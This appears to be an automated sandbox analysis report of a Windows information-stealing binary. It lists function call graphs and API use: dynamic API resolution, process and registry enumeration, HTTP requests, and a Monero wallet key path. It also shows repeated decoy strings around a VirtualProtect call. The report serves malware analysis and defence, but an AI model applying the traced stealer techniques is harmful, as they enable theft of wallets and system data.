15020->15021 15022 5d254c 15021->15022 15023 5d8320 17 API calls 15022->15023 15024 5d2568 15023->15024 15025 5da920 3 API calls 15024->15025 15026 5d257b 15025->15026 15027 5da8a0 lstrcpy 15026->15027 15028 5d2584 15027->15028 15029 5da9b0 4 API calls 15028->15029 15030 5d25ae 15029->15030 15031 5da8a0 lstrcpy 15030->15031 15032 5d25b7 15031->15032 15033 5da9b0 4 API calls 15032->15033 15034 5d25d6 15033->15034 15035 5da8a0 lstrcpy 15034->15035 15036 5d25df 15035->15036 15037 5da9b0 4 API calls 15036->15037 15038 5d2600 15037->15038 15039 5da8a0 lstrcpy 15038->15039 15040 5d2609 15039->15040 15586 5d8680 15040->15586 15042 5d2620 15043 5da920 3 API calls 15042->15043 15044 5d2633 15043->15044 15045 5da8a0 lstrcpy 15044->15045 15046 5d263c 15045->15046 15047 5d265a lstrlen 15046->15047 15048 5d266a 15047->15048 15049 5da740 lstrcpy 15048->15049 15050 5d267c 15049->15050 15051 5c1590 lstrcpy 15050->15051 15052 5d268d 15051->15052 15596 5d5190 15052->15596 15054 5d2699 15054->13486 15784 5daad0 15055->15784 15057 5c5009 InternetOpenUrlA 15061 5c5021 15057->15061 15058 5c502a InternetReadFile 15058->15061 15059 5c50a0 InternetCloseHandle InternetCloseHandle 15060 5c50ec 15059->15060 15060->13490 15061->15058 15061->15059 15785 5c98d0 15062->15785 15064 5d0759 15065 5d077d 15064->15065 15066 5d0a38 15064->15066 15068 5d0799 StrCmpCA 15065->15068 15067 5c1590 lstrcpy 15066->15067 15069 5d0a49 15067->15069 15071 5d0843 15068->15071 15072 5d07a8 15068->15072 15961 5d0250 15069->15961 15075 5d0865 StrCmpCA 15071->15075 15074 5da7a0 lstrcpy 15072->15074 15076 5d07c3 15074->15076 15077 5d0874 15075->15077 15114 5d096b 15075->15114 15078 5c1590 lstrcpy 15076->15078 15079 5da740 lstrcpy 15077->15079 15080 5d080c 15078->15080 15082 5d0881 15079->15082 15083 5da7a0 lstrcpy 15080->15083 15081 5d099c StrCmpCA 15084 5d09ab 15081->15084 15085 5d0a2d 15081->15085 15086 5da9b0 4 API calls 15082->15086 15087 5d0823 15083->15087 15088 5c1590 lstrcpy 15084->15088 15085->13494 15089 
5d08ac 15086->15089 15090 5da7a0 lstrcpy 15087->15090 15091 5d09f4 15088->15091 15092 5da920 3 API calls 15089->15092 15093 5d083e 15090->15093 15094 5da7a0 lstrcpy 15091->15094 15095 5d08b3 15092->15095 15788 5cfb00 15093->15788 15097 5d0a0d 15094->15097 15098 5da9b0 4 API calls 15095->15098 15099 5da7a0 lstrcpy 15097->15099 15100 5d08ba 15098->15100 15101 5d0a28 15099->15101 15114->15081 15436 5da7a0 lstrcpy 15435->15436 15437 5c1683 15436->15437 15438 5da7a0 lstrcpy 15437->15438 15439 5c1695 15438->15439 15440 5da7a0 lstrcpy 15439->15440 15441 5c16a7 15440->15441 15442 5da7a0 lstrcpy 15441->15442 15443 5c15a3 15442->15443 15443->14317 15445 5c47c6 15444->15445 15446 5c4838 lstrlen 15445->15446 15470 5daad0 15446->15470 15448 5c4848 InternetCrackUrlA 15449 5c4867 15448->15449 15449->14394 15451 5da740 lstrcpy 15450->15451 15452 5d8b74 15451->15452 15453 5da740 lstrcpy 15452->15453 15454 5d8b82 GetSystemTime 15453->15454 15456 5d8b99 15454->15456 15455 5da7a0 lstrcpy 15457 5d8bfc 15455->15457 15456->15455 15457->14409 15459 5da931 15458->15459 15460 5da988 15459->15460 15463 5da968 lstrcpy lstrcat 15459->15463 15461 5da7a0 lstrcpy 15460->15461 15462 5da994 15461->15462 15462->14412 15463->15460 15464->14527 15466 5c9af9 LocalAlloc 15465->15466 15467 5c4eee 15465->15467 15466->15467 15468 5c9b14 CryptStringToBinaryA 15466->15468 15467->14415 15467->14418 15468->15467 15469 5c9b39 LocalFree 15468->15469 15469->15467 15470->15448 15471->14537 15472->14678 15473->14680 15474->14688 15603 5d77a0 15475->15603 15478 5d1c1e 15478->14770 15479 5d76c6 RegOpenKeyExA 15480 5d7704 RegCloseKey 15479->15480 15481 5d76e7 RegQueryValueExA 15479->15481 15480->15478 15481->15480 15483 5d1c99 15482->15483 15483->14784 15485 5d1e09 15484->15485 15485->14826 15487 5d7a9a wsprintfA 15486->15487 15488 5d1e84 15486->15488 15487->15488 15488->14840 15490 5d7b4d 15489->15490 15491 5d1efe 15489->15491 15610 5d8d20 LocalAlloc CharToOemW 15490->15610 15491->14854 15494 5da740 lstrcpy 
15493->15494 15495 5d7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15494->15495 15502 5d7c25 15495->15502 15496 5d7d18 15498 5d7d1e LocalFree 15496->15498 15499 5d7d28 15496->15499 15497 5d7c46 GetLocaleInfoA 15497->15502 15498->15499 15501 5da7a0 lstrcpy 15499->15501 15500 5da9b0 lstrcpy lstrlen lstrcpy lstrcat 15500->15502 15504 5d7d37 15501->15504 15502->15496 15502->15497 15502->15500 15503 5da8a0 lstrcpy 15502->15503 15503->15502 15504->14867 15506 5d2008 15505->15506 15506->14882 15508 5d94b5 15507->15508 15509 5d9493 GetModuleFileNameExA CloseHandle 15507->15509 15510 5da740 lstrcpy 15508->15510 15509->15508 15511 5d2091 15510->15511 15511->14897 15513 5d7e68 RegQueryValueExA 15512->15513 15514 5d2119 15512->15514 15515 5d7e8e RegCloseKey 15513->15515 15514->14911 15515->15514 15517 5d7fb9 GetLogicalProcessorInformationEx 15516->15517 15518 5d7fd8 GetLastError 15517->15518 15523 5d8029 15517->15523 15519 5d8022 15518->15519 15528 5d7fe3 15518->15528 15522 5d2194 15519->15522 15525 5d89f0 2 API calls 15519->15525 15522->14925 15524 5d89f0 2 API calls 15523->15524 15526 5d807b 15524->15526 15525->15522 15526->15519 15527 5d8084 wsprintfA 15526->15527 15527->15522 15528->15517 15528->15522 15611 5d89f0 15528->15611 15614 5d8a10 GetProcessHeap RtlAllocateHeap 15528->15614 15530 5d220f 15529->15530 15530->14939 15532 5d89b0 15531->15532 15533 5d814d GlobalMemoryStatusEx 15532->15533 15534 5d8163 __aulldiv 15533->15534 15535 5d819b wsprintfA 15534->15535 15536 5d2289 15535->15536 15536->14953 15538 5d87fb GetProcessHeap RtlAllocateHeap wsprintfA 15537->15538 15540 5da740 lstrcpy 15538->15540 15541 5d230b 15540->15541 15541->14967 15543 5da740 lstrcpy 15542->15543 15544 5d8229 15543->15544 15545 5d8263 15544->15545 15547 5da9b0 lstrcpy lstrlen lstrcpy lstrcat 15544->15547 15549 5da8a0 lstrcpy 15544->15549 15546 5da7a0 lstrcpy 15545->15546 15548 5d82dc 15546->15548 15547->15544 15548->14984 15549->15544 15551 5da740 lstrcpy 15550->15551 15552 5d835c 
RegOpenKeyExA 15551->15552 15553 5d83ae 15552->15553 15554 5d83d0 15552->15554 15555 5da7a0 lstrcpy 15553->15555 15556 5d83f8 RegEnumKeyExA 15554->15556 15557 5d8613 RegCloseKey 15554->15557 15567 5d83bd 15555->15567 15559 5d843f wsprintfA RegOpenKeyExA 15556->15559 15560 5d860e 15556->15560 15558 5da7a0 lstrcpy 15557->15558 15558->15567 15561 5d8485 RegCloseKey RegCloseKey 15559->15561 15562 5d84c1 RegQueryValueExA 15559->15562 15560->15557 15565 5da7a0 lstrcpy 15561->15565 15563 5d84fa lstrlen 15562->15563 15564 5d8601 RegCloseKey 15562->15564 15563->15564 15566 5d8510 15563->15566 15564->15560 15565->15567 15568 5da9b0 4 API calls 15566->15568 15567->15010 15569 5d8527 15568->15569 15570 5da8a0 lstrcpy 15569->15570 15571 5d8533 15570->15571 15572 5da9b0 4 API calls 15571->15572 15573 5d8557 15572->15573 15574 5da8a0 lstrcpy 15573->15574 15575 5d8563 15574->15575 15576 5d856e RegQueryValueExA 15575->15576 15576->15564 15577 5d85a3 15576->15577 15578 5da9b0 4 API calls 15577->15578 15579 5d85ba 15578->15579 15580 5da8a0 lstrcpy 15579->15580 15581 5d85c6 15580->15581 15582 5da9b0 4 API calls 15581->15582 15583 5d85ea 15582->15583 15584 5da8a0 lstrcpy 15583->15584 15585 5d85f6 15584->15585 15585->15564 15587 5da740 lstrcpy 15586->15587 15588 5d86bc CreateToolhelp32Snapshot Process32First 15587->15588 15589 5d875d CloseHandle 15588->15589 15590 5d86e8 Process32Next 15588->15590 15591 5da7a0 lstrcpy 15589->15591 15590->15589 15595 5d86fd 15590->15595 15592 5d8776 15591->15592 15592->15042 15593 5da9b0 lstrcpy lstrlen lstrcpy lstrcat 15593->15595 15594 5da8a0 lstrcpy 15594->15595 15595->15590 15595->15593 15595->15594 15597 5da7a0 lstrcpy 15596->15597 15598 5d51b5 15597->15598 15599 5c1590 lstrcpy 15598->15599 15600 5d51c6 15599->15600 15615 5c5100 15600->15615 15602 5d51cf 15602->15054 15606 5d7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15603->15606 15605 5d76b9 15605->15478 15605->15479 15607 5d7765 RegQueryValueExA 15606->15607 15608 5d7780 RegCloseKey 
15606->15608 15607->15608 15609 5d7793 15608->15609 15609->15605 15610->15491 15612 5d8a0c 15611->15612 15613 5d89f9 GetProcessHeap HeapFree 15611->15613 15612->15528 15613->15612 15614->15528 15616 5da7a0 lstrcpy 15615->15616 15617 5c5119 15616->15617 15618 5c47b0 2 API calls 15617->15618 15619 5c5125 15618->15619 15775 5d8ea0 15619->15775 15621 5c5184 15622 5c5192 lstrlen 15621->15622 15623 5c51a5 15622->15623 15624 5d8ea0 4 API calls 15623->15624 15625 5c51b6 15624->15625 15626 5da740 lstrcpy 15625->15626 15627 5c51c9 15626->15627 15628 5da740 lstrcpy 15627->15628 15629 5c51d6 15628->15629 15630 5da740 lstrcpy 15629->15630 15631 5c51e3 15630->15631 15632 5da740 lstrcpy 15631->15632 15633 5c51f0 15632->15633 15634 5da740 lstrcpy 15633->15634 15635 5c51fd InternetOpenA StrCmpCA 15634->15635 15636 5c522f 15635->15636 15637 5c58c4 InternetCloseHandle 15636->15637 15638 5d8b60 3 API calls 15636->15638 15644 5c58d9 ctype 15637->15644 15639 5c524e 15638->15639 15640 5da920 3 API calls 15639->15640 15641 5c5261 15640->15641 15642 5da8a0 lstrcpy 15641->15642 15643 5c526a 15642->15643 15645 5da9b0 4 API calls 15643->15645 15647 5da7a0 lstrcpy 15644->15647 15646 5c52ab 15645->15646 15648 5da920 3 API calls 15646->15648 15656 5c5913 15647->15656 15649 5c52b2 15648->15649 15650 5da9b0 4 API calls 15649->15650 15651 5c52b9 15650->15651 15652 5da8a0 lstrcpy 15651->15652 15653 5c52c2 15652->15653 15654 5da9b0 4 API calls 15653->15654 15655 5c5303 15654->15655 15657 5da920 3 API calls 15655->15657 15656->15602 15658 5c530a 15657->15658 15659 5da8a0 lstrcpy 15658->15659 15660 5c5313 15659->15660 15661 5c5329 InternetConnectA 15660->15661 15661->15637 15662 5c5359 HttpOpenRequestA 15661->15662 15664 5c58b7 InternetCloseHandle 15662->15664 15665 5c53b7 15662->15665 15664->15637 15666 5da9b0 4 API calls 15665->15666 15667 5c53cb 15666->15667 15668 5da8a0 lstrcpy 15667->15668 15669 5c53d4 15668->15669 15670 5da920 3 API calls 15669->15670 15671 5c53f2 15670->15671 15672 5da8a0 
lstrcpy 15671->15672 15673 5c53fb 15672->15673 15674 5da9b0 4 API calls 15673->15674 15675 5c541a 15674->15675 15676 5da8a0 lstrcpy 15675->15676 15677 5c5423 15676->15677 15678 5da9b0 4 API calls 15677->15678 15679 5c5444 15678->15679 15680 5da8a0 lstrcpy 15679->15680 15681 5c544d 15680->15681 15682 5da9b0 4 API calls 15681->15682 15683 5c546e 15682->15683 15684 5da8a0 lstrcpy 15683->15684 15776 5d8ead CryptBinaryToStringA 15775->15776 15777 5d8ea9 15775->15777 15776->15777 15778 5d8ece GetProcessHeap RtlAllocateHeap 15776->15778 15777->15621 15778->15777 15779 5d8ef4 ctype 15778->15779 15780 5d8f05 CryptBinaryToStringA 15779->15780 15780->15777 15784->15057 16027 5c9880 15785->16027 15787 5c98e1 15787->15064 15789 5da740 lstrcpy 15788->15789 15962 5da740 lstrcpy 15961->15962 15963 5d0266 15962->15963 15964 5d8de0 2 API calls 15963->15964 15965 5d027b 15964->15965 15966 5da920 3 API calls 15965->15966 15967 5d028b 15966->15967 15968 5da8a0 lstrcpy 15967->15968 15969 5d0294 15968->15969 15970 5da9b0 4 API calls 15969->15970 15971 5d02b8 15970->15971 16028 5c988e 16027->16028 16031 5c6fb0 16028->16031 16030 5c98ad ctype 16030->15787 16034 5c6d40 16031->16034 16035 5c6d63 16034->16035 16049 5c6d59 16034->16049 16050 5c6530 16035->16050 16039 5c6dbe 16039->16049 16060 5c69b0 16039->16060 16041 5c6e2a 16042 5c6ee6 VirtualFree 16041->16042 16044 5c6ef7 16041->16044 16041->16049 16042->16044 16043 5c6f41 16047 5d89f0 2 API calls 16043->16047 16043->16049 16044->16043 16045 5c6f38 16044->16045 16046 5c6f26 FreeLibrary 16044->16046 16048 5d89f0 2 API calls 16045->16048 16046->16044 16047->16049 16048->16043 16049->16030 16051 5c6542 16050->16051 16053 5c6549 16051->16053 16070 5d8a10 GetProcessHeap RtlAllocateHeap 16051->16070 16053->16049 16054 5c6660 16053->16054 16059 5c668f VirtualAlloc 16054->16059 16056 5c673c 16056->16039 16057 5c6730 16057->16056 16058 5c6743 VirtualAlloc 16057->16058 16058->16056 16059->16056 16059->16057 16061 5c69c9 16060->16061 16065 5c69d5 
16060->16065 16062 5c6a09 LoadLibraryA 16061->16062 16061->16065 16063 5c6a32 16062->16063 16062->16065 16067 5c6ae0 16063->16067 16071 5d8a10 GetProcessHeap RtlAllocateHeap 16063->16071 16065->16041 16066 5c6ba8 GetProcAddress 16066->16065 16066->16067 16067->16065 16067->16066 16068 5d89f0 2 API calls 16068->16067 16069 5c6a8b 16069->16065 16069->16068 16070->16053 16071->16069

                        Control-flow Graph

                        control_flow_graph 660 5d9860-5d9874 call 5d9750 663 5d987a-5d9a8e call 5d9780 GetProcAddress * 21 660->663 664 5d9a93-5d9af2 LoadLibraryA * 5 660->664 663->664 665 5d9b0d-5d9b14 664->665 666 5d9af4-5d9b08 GetProcAddress 664->666 668 5d9b46-5d9b4d 665->668 669 5d9b16-5d9b41 GetProcAddress * 2 665->669 666->665 671 5d9b4f-5d9b63 GetProcAddress 668->671 672 5d9b68-5d9b6f 668->672 669->668 671->672 673 5d9b89-5d9b90 672->673 674 5d9b71-5d9b84 GetProcAddress 672->674 675 5d9bc1-5d9bc2 673->675 676 5d9b92-5d9bbc GetProcAddress * 2 673->676 674->673 676->675
                        APIs
                        • GetProcAddress.KERNEL32(76210000,014A1608), ref: 005D98A1
                        • GetProcAddress.KERNEL32(76210000,014A1680), ref: 005D98BA
                        • GetProcAddress.KERNEL32(76210000,014A15A8), ref: 005D98D2
                        • GetProcAddress.KERNEL32(76210000,014A1560), ref: 005D98EA
                        • GetProcAddress.KERNEL32(76210000,014A15C0), ref: 005D9903
                        • GetProcAddress.KERNEL32(76210000,014A8B38), ref: 005D991B
                        • GetProcAddress.KERNEL32(76210000,01495088), ref: 005D9933
                        • GetProcAddress.KERNEL32(76210000,01494F48), ref: 005D994C
                        • GetProcAddress.KERNEL32(76210000,014A1728), ref: 005D9964
                        • GetProcAddress.KERNEL32(76210000,014A1590), ref: 005D997C
                        • GetProcAddress.KERNEL32(76210000,014A1698), ref: 005D9995
                        • GetProcAddress.KERNEL32(76210000,014A1740), ref: 005D99AD
                        • GetProcAddress.KERNEL32(76210000,01495148), ref: 005D99C5
                        • GetProcAddress.KERNEL32(76210000,014A16B0), ref: 005D99DE
                        • GetProcAddress.KERNEL32(76210000,014A1578), ref: 005D99F6
                        • GetProcAddress.KERNEL32(76210000,01494FA8), ref: 005D9A0E
                        • GetProcAddress.KERNEL32(76210000,014A16F8), ref: 005D9A27
                        • GetProcAddress.KERNEL32(76210000,014A16C8), ref: 005D9A3F
                        • GetProcAddress.KERNEL32(76210000,01495188), ref: 005D9A57
                        • GetProcAddress.KERNEL32(76210000,014A17D0), ref: 005D9A70
                        • GetProcAddress.KERNEL32(76210000,014951A8), ref: 005D9A88
                        • LoadLibraryA.KERNEL32(014A16E0,?,005D6A00), ref: 005D9A9A
                        • LoadLibraryA.KERNEL32(014A14E8,?,005D6A00), ref: 005D9AAB
                        • LoadLibraryA.KERNEL32(014A1710,?,005D6A00), ref: 005D9ABD
                        • LoadLibraryA.KERNEL32(014A1758,?,005D6A00), ref: 005D9ACF
                        • LoadLibraryA.KERNEL32(014A1770,?,005D6A00), ref: 005D9AE0
                        • GetProcAddress.KERNEL32(75B30000,014A1788), ref: 005D9B02
                        • GetProcAddress.KERNEL32(751E0000,014A1518), ref: 005D9B23
                        • GetProcAddress.KERNEL32(751E0000,014A1530), ref: 005D9B3B
                        • GetProcAddress.KERNEL32(76910000,014A9070), ref: 005D9B5D
                        • GetProcAddress.KERNEL32(75670000,014951C8), ref: 005D9B7E
                        • GetProcAddress.KERNEL32(77310000,014A8AE8), ref: 005D9B9F
                        • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 005D9BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 005D9BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 0abe843c564d737f342c3fb83748743e5bdd05ce3ddaa2c909eef563a2628f78
                        • Instruction ID: ddbf7f6870fe11d13df2d45c05f24bc7c51e492f02038a192a7ef9fe38431be4
                        • Opcode Fuzzy Hash: 0abe843c564d737f342c3fb83748743e5bdd05ce3ddaa2c909eef563a2628f78
                        • Instruction Fuzzy Hash: 49A11BB6510344AFD3DCEFA8ED88A663BF9F78D301714C52AA645C3264D739A841CB52

                        Control-flow Graph

                        control_flow_graph 764 5c45c0-5c4695 RtlAllocateHeap 781 5c46a0-5c46a6 764->781 782 5c46ac-5c474a 781->782 783 5c474f-5c47a9 VirtualProtect 781->783 782->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005C460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 005C479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C45D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C46B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C45E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C45F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C46CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C45DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C46AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C46C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C45C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C46D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 7d6b5bb0886f354b54714608d7c215c6841851ead91230df25d8a7967726e58d
                        • Instruction ID: 738ffae114688c72d5f40b359bbd85fef143b17161f54d0c6a77a65a72dee528
                        • Opcode Fuzzy Hash: 7d6b5bb0886f354b54714608d7c215c6841851ead91230df25d8a7967726e58d
                        • Instruction Fuzzy Hash: FF4116607D168C6AC72EFBE7884EEFD7B7A7F42704F50504AA85853280DBF079094522

                        Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005C4839
                          • Part of subcall function 005C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005C4849
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005C4915
                        • StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005C4ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,005E0DDB,00000000,?,?,00000000,?,",00000000,?,014B0D30), ref: 005C4DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005C4E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005C4E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005C4E49
                        • InternetCloseHandle.WININET(00000000), ref: 005C4EAD
                        • InternetCloseHandle.WININET(00000000), ref: 005C4EC5
                        • HttpOpenRequestA.WININET(00000000,014B0D10,?,014B0588,00000000,00000000,00400100,00000000), ref: 005C4B15
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • InternetCloseHandle.WININET(00000000), ref: 005C4ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
